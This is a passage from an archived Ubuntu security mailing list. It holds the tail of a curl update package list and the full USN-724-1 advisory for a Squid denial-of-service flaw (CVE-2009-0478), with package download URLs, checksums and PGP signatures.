    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:  1046972 f93a0314315ca010c1e000d6094b529e
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   197474 bedb0ae75d50745d9070d598a7f3bbed
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   204090 7db96e2a1af5229b5c05fe332c30f756
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   869990 16be192ab09c1ca78a48d50b599b6868
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_lpia.deb
      Size/MD5:   876092 896c0bbc2eee392cbac4a18b5996931b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   201932 c3f6e455e85ddc6e69daf3431ea58e74
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:  1063946 a5d52c748048bf586cedb02daf29fb7a
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   210994 5602b8c0c9979c0eba7eff319d5bc77e
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   216006 8d65ea79097e0e635f75382d7aaecf6b
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   895512 ef52c8d4b5a097751646d1174bca4c35
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_powerpc.deb
      Size/MD5:   902650 dd88be6fee4e0382db0af0cc490877b0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   197586 db78b2c9b6402e0f9ed9cb9bf7cd4872
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:  1027024 0ead1406330f62ff04c0177d185a53a9
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   196652 3e829cf092deb68935946eccb4471663
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   202218 ba4d43feba5bc66630d46766f1ae5dd3
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   877208 20b30bf93d62e6c2c165ee6be374435f
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_sparc.deb
      Size/MD5:   883238 66b2bc1ab0da39b981e35aaf694e6b67

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1.diff.gz
      Size/MD5:    22211 6e74e8584ae7aebb6c14d3a114796454
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1.dsc
      Size/MD5:     1491 9b355d2d245a85cbca121726652e7f8d
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2.orig.tar.gz
      Size/MD5:  2273077 4fe99398a64a34613c9db7bd61bf6e3c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   210246 d67a5eb49a6f5e427bd1654007f455a7
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:  1124684 57f1830f3a2e4ffdec0180717f3191a0
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   216106 e36ff6ee975146c248c293ce0f8cfc6b
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   223206 56e2f570c4c989bca172cfc09a370d39
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   926082 5cc5411540ce23be3354b1f4d5fc041f
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_amd64.deb
      Size/MD5:   933036 adcb522fbbb4f3ab68b4fa8af804d5b7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   209080 80b442fba7924160f234f6d2fc5be8ea
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:  1091876 d294a4ad45febe82279359741d6958c4
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   212550 7c5a86d097564f4563cd4992c65544a9
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   219490 83026954c17912ed54036e2f81118310
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   899576 bb001dda2e0e9def2d08f99497adfbcd
    http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_i386.deb
      Size/MD5:   905326 74ff52579922240c1a034c0f223b1a1a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   208732 cdc604e918825dd8ca06fb07b69d90ba
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:  1099032 5e1a71fa663f6f21944bf7078c57aebe
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   210790 2486bf054d91bf5e5cd32fae20d2002a
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   217316 32814e9da3f6ea13b6b2a77e872f92fc
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   898464 3028bc84dcbc05a2a65d50f49f0ed2f0
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_lpia.deb
      Size/MD5:   903772 00495fb44aba7d390ddb7643de104fca

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   212494 c0ad35c9fbaa7afeb9247b948bf3720e
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:  1130288 8a65d0227f3697b505e4634cff6831fd
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   223618 b5d5085350540d988abc19c5dcb04ea6
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   229464 8053abc5beb65a37ea489eeec41ab2c2
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   925362 8277d9fb3b898cf90e4fa46ffcf71147
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_powerpc.deb
      Size/MD5:   931700 13f3edf118024e221d7f45abd05c0e7e

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   209542 6478e46bb2850c50f7b4def0d86b730b
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:  1072458 5eaf45a5c000a1f8b0d09bbab983b8ae
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   209228 83c8fcd128286fd77d9983fff53d9563
    http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   213982 bf031afa898326f814e2dea63fdc0523
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   904780 f3ac8d6aab6a12a4b8462152e38463a9
    http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.1_sparc.deb
      Size/MD5:   909856 c991e46b6bb3a47c79e7615f398de261



--=-vVlpg2N7rxwQ1FwKUF+4
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkmtiIgACgkQLMAs/0C4zNogiQCeNKFimFzDZ3+zukGjxQanFwBl
M3EAoIzfq+FMlDv93YEBFyiUCdAI9Jqy
=sUO0
-----END PGP SIGNATURE-----

--=-vVlpg2N7rxwQ1FwKUF+4--



--==============�12105205218476806=Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

-- 
ubuntu-security-announce mailing list
ubuntu-security-announce@lists.ubuntu.com
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce

--==============�12105205218476806==--

From - Thu Mar 12 12:01:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006917
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39727-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F387FED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:59:38 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 513C5143BE1; Thu, 12 Mar 2009 08:15:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17455 invoked from network); 12 Mar 2009 12:31:16 -0000
Delivered-To: unknown
X-Bluewin-Spam-Analysis: v=1.0 c=1 a�6q0cyCUc8QNek+tXvRSQ==:17 a=fxJcL_dCAAAA:8 a=naBvIf12gbkYSUtLRzcA:9 a=x9DMJtNAht-e5whbRC6kwHR3mRUA:4 a=tQPsmlJHCTUA:10 a=8syroioSFNE_p0r_xLMA:9 a=JSsWRbtj2K4QUKzWHRLl7xudwpwA:4 a=rPt6xJ-oxjAA:10 a=P1drAwA31TSgsCTGxHwA:9 a=k5Y7EBnc9jxqYCPMpR8A:7 a=Nta1huVKbUs5GKbA149sw85oqDcA:4
X-Bluewin-Spam-Score: 0
X-FXIT-IP: IPv4[91.189.94.204] Epoch[1235651714]
Date: Thu, 26 Feb 2009 06:28:55 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-724-1] Squid vulnerability
Message-ID: <20090226122855.GD6712@severus.strandboge.com>
MIME-Version: 1.0
User-Agent: Mutt/1.5.18 (2008-05-17)
X-Mailman-Approved-At: Thu, 26 Feb 2009 12:32:25 +0000
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
X-BeenThere: ubuntu-security-announce@lists.ubuntu.com
X-Mailman-Version: 2.1.8
Reply-To: ubuntu-users@lists.ubuntu.com,
Jamie Strandboge <jamie@canonical.com>
Content-Type: multipart/mixed; boundary="==============55106975916943733=="
Mime-version: 1.0
Sender: ubuntu-security-announce-bounces@lists.ubuntu.com
Errors-To: ubuntu-security-announce-bounces@lists.ubuntu.com
Status:   


--==============55106975916943733=Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="OaZoDhBhXzo6bW1J"
Content-Disposition: inline


--OaZoDhBhXzo6bW1J
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-724-1          February 25, 2009
squid vulnerability
CVE-2009-0478
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  squid                           2.7.STABLE3-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Joshua Morin, Mikko Varpiola and Jukka Taimisto discovered that Squid did
not properly validate the HTTP version when processing requests. A remote
attacker could exploit this to cause a denial of service (assertion failure).


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.diff.gz
      Size/MD5:   303042 9132293f589a71ae3f771e1ae6de30f1
    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1.dsc
      Size/MD5:     1252 6953f88d6f4825daabd9e77bd0fa1a88
    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3.orig.tar.gz
      Size/MD5:  1782040 a4d7608696e2b617aa5853c7d23e25b0

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.7.STABLE3-1ubuntu2.1_all.deb
      Size/MD5:   495876 b6d1e76b140c792297c14382a06ed3e3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_amd64.deb
      Size/MD5:   771610 7f2ca95b0497cc23f0bf26b7a6503cc7
    http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_amd64.deb
      Size/MD5:   119880 27ff06a902debe143acb7b3959fb1c52

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_i386.deb
      Size/MD5:   695708 312c710ebdb46e3017b02cb672d14524
    http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_i386.deb
      Size/MD5:   118638 f2f2f698523d49d8971c7a22faebc427

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_lpia.deb
      Size/MD5:   694080 6720b3aca93aabb7600a1a2c2f699af5
    http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_lpia.deb
      Size/MD5:   118550 7484981bd7c4c8b6361362e98d5d1631

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_powerpc.deb
      Size/MD5:   777958 b9d530e92ad4638fb8d169ef55eb33f4
    http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_powerpc.deb
      Size/MD5:   120446 9899cd403bbca3e0e6f5a936cd2d9955

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_sparc.deb
      Size/MD5:   719088 2781d6fd1c7adc0b76aa12670ac1abb5
    http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_sparc.deb
      Size/MD5:   119398 8a26b4da728c31d7bd116666191575b2




© 1998-2024 E-Soft Inc. Alle Rechte vorbehalten.